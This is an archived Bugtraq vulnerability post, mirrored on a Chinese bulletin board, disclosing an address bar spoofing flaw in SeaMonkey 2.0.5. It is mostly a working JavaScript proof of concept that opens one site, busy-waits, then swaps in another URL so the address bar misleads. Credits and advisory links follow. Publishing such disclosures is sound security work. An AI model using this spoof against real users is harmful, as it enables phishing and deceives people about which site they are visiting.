SeaMonkey 2.0.5 Address Bar Spoofing Vulnerability

看板Bugtraq作者時間15年前 (2010/07/20 02:01), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
Spoof Code: <script language="javascript"> function pause(pd) { date = new Date(); var curDate = null; do { var curDate = new Date(); } while(curDate-date < pd); } function Spoofing () { win = window.open('http://www.google.com','new') pause (13000) win = window.open('http://www.Securitylab.ir','new') } </script> <a href="javascript: Spoofing()">Click Here</a> ########################################################################## Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com) Original Advisory: http://pouya.info/blog/userfiles/pdf/SeaMonkey-ABS.pdf http://Securitylab.ir/Advisory
文章代碼(AID): #1CH9BV4G (Bugtraq)